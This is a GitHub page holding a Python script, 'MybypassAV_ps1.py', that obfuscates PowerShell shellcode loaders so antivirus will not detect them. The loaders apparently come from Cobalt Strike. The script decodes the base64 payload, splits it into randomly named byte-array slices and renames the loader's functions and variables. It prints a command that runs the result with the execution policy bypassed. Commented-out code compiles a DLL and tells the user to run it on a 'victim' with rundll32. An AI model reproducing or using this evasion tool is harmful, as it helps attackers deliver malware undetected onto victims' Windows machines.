-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathMybypassAV_ps1.py
204 lines (185 loc) · 7.53 KB
/
MybypassAV_ps1.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
#!/usr/bin/env python3
# author: Komomon(github)
import sys
import random
import string
import os
import time
import platform
import argparse
import re
import base64
'''
目前实现,部分变量名称随机化替换
payload部分转为字节数组,随机化分割,再拼接
todo:
所有变量或关键词的随机化
'''
# a-zA-Z 生成一个长度为8-15的字符串
def get_random_string():
# With combination of lower and upper case
length = random.randint(8, 15)
result_str = ''.join(random.choice(string.ascii_letters) for i in range(length))
# print random string
return result_str
def xor(data):
key = get_random_string()
l = len(key)
output_str = ""
flag = 0
for i in range(len(data)):
current = data[i]
current_key = key[i % len(key)]
o = lambda x: x if isinstance(x, int) else ord(x) # 处理字节而不是字符串的数据 ord()函数主要用来返回对应字符的ascii码
output_str += chr(o(current) ^ ord(current_key)) # 异或运算并加到一起
ciphertext = ""
for x in output_str:
ciphertext += hex(ord(x)) + ", "
flag += 1
if flag == 15:
ciphertext += "\n"
flag = 0
ciphertext = "{ " + ciphertext + "0x00};"
# ciphertext = '{ ' + ', '.join(hex(ord(x)) for x in output_str) + ', 0x00};' # 16进制结果拼接到数组中,hex(ord("x"))=0x78 取后两位
# print(ciphertext)
# ciphertext = '{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in output_str) + ', 0x00};' # hex(ord("x"))=0x78 取后两位
# print(ciphertext)
return ciphertext, key
def list_random_slice(data_list):
slice_num = random.randint(5, 15)
result_list = []
length = len(data_list)
step = length // slice_num
# 排除最后会余几个的情况,毕竟上面是四舍运算
if step*slice_num >=length:
pass
else:
slice_num += 1
for n in range(0, length, step):
# random_num = random.randint(1, length)
result_list.append(data_list[n:n+step])
# index += random_num
# length = length - random_num
# print(result_list)
return result_list, slice_num
def ps1_bypassAV(payload_file):
try:
# print(1)
original = open(payload_file, "rt") # 读取为字节以处理字符集解析问题
data = original.read()
# print(2)
except Exception as e:
print("err:", e)
print("[*] Failed to read " + payload_file + " :( [*]")
print("[*] Missing " + payload_file + " in pwd? [*]")
sys.exit(1) # exit if read failed
# print(3)
# get base64 payload
payload_base64 = re.findall(r"\[System.Convert]::FromBase64String\('(.*?)'\)", data)[0]
# print(payload)
byte_data = bytearray(base64.b64decode(payload_base64))
# print(byte_data)
byte_list = []
# payload_type_str_list = []
for i in byte_data:
# baselist2.append(ord(i))
byte_list.append(i)
payload_byte_list, slice_num = list_random_slice(byte_list)
# print(slice_num)
# print("result", result)
# print(byte_list)
payload_slice_names = []
payload = ''
# 生成分片变量名字
for i in range(slice_num):
payload_slice_names.append(get_random_string())
# 生成多个payload的分片ps1 代码
for sublist in payload_byte_list:
# [Byte[]]$var_c1 = [Byte[]](31,42,160,68,249)
# print(sublist)
payload += "[Byte[]]$" + payload_slice_names[payload_byte_list.index(sublist)] +" = [Byte[]](" + ",".join(str(byte) for byte in sublist) + ")\n\t"
# exit(0)
# payload_name = get_random_string()
payload = payload + "\n\t[Byte[]]$var_code = " + " + ".join("$"+x for x in payload_slice_names)
# payload_byte_str = "(" + ",".join(str(byte) for byte in byte_list) + ")"
# for byte in byte_list:
# payload_byte_str += byte
# print(payload)
# payload = "[Byte[]]" + payload_byte_str
# data = data.replace(payload_base64,)
data = re.sub(r"\[Byte\[]]\$var_code = \[System.Convert]::FromBase64String\('(.*?)'\)", payload, data, 1)
# payload = re.findall(r"\[System.Convert]::FromBase64String\('(.*?)'\)", data)[0]
# print(data)
# data = data.replace("[System.Convert]::FromBase64String", "[Byte[]]")
func_fgpa_name = get_random_string()
func_fgdt_name = get_random_string()
var_str = get_random_string()
param_x_name = get_random_string()
resultps1_name = get_random_string()
data = data.replace("func_get_proc_address", func_fgpa_name)
data = data.replace("func_get_delegate_type", func_fgdt_name)
data = data.replace("$var_", "$" + var_str)
data = data.replace("$x", "$" + param_x_name)
original.close()
# resultps1_name = "resultps1_name"
resultps1 = open(resultps1_name + ".ps1", "w+")
resultps1.write(data)
time.sleep(1)
print("[*] " + resultps1_name + ".ps1 generated! [*]")
print("[*] Usage: powershell -ExecutionPolicy bypass -File .\\" + resultps1_name + ".ps1 generated! [*]")
time.sleep(1)
resultps1.close()
return resultps1_name + ".ps1"
# ps1_bypassAV("csps64.ps1")
#
# def main(beaconbin_file):
# # print(banner)
#
# time.sleep(3)
# try:
# print("[*] Initialising charlotte() [*]")
# time.sleep(1)
# e1 = charlotte(beaconbin_file)
# except Exception as e:
# print("EEEE:", e)
# print("[*] charlotte() failed? :( [*]")
# sys.exit(1) # exit if code generation failed
# print("[*] Completed - Compiling " + e1 + ".dll [*]")
# time.sleep(1)
# if platform.system() == "Windows":
# print('windows')
# print('windows 自行编译')
# elif platform.system() == "Linux":
# print('linux')
# try:
# # os.system("x86_64-w64-mingw32-g++ -shared -o charlotte.dll charlotte.cpp -fpermissive >/dev/null 2>&1")
# os.system("x86_64-w64-mingw32-g++ -shared -o " + e1 + ".dll " + e1 + ".cpp -fpermissive >/dev/null 2>&1")
# print("[*] Cross Compile Success! [*]")
# except:
# print("[*] Compilation failed :( [*]")
# time.sleep(1)
# # print("[*] Removing charlotte.cpp... [*]")
# # os.system("rm " + e1 + ".cpp")
# # time.sleep(1)
#
# print("[*] Execute on your Windows x64 victim with: [*]")
# print("[*] rundll32 " + e1 + ".dll, " + e1 + " [*]")
# time.sleep(2)
# print("\n")
#
#
if __name__ == "__main__":
banner = """
Miansha Ps1 Write By Komomon
"""
print(banner)
parser = argparse.ArgumentParser(usage="", description="des")
parser.add_argument("-f", "--file", type=str, dest="file", required=True, help="The powershell file")
# parser.add_argument("--port", type=int, dest="port", default=22, help="ports to scan")
# parser.add_argument("-t", "--timeout", type=int, default=10, dest="timeout", help="Request timeout")
# parser.add_argument("-u", "--user", type=str, required=True, dest="username", help="Username")
# parser.add_argument("-p", "--pass", type=str, required=True, dest="password", help="Password")
args = parser.parse_args()
ps1_file = args.file
# ps1_bypassAV("csps64.ps1")
ps1_bypassAV(ps1_file)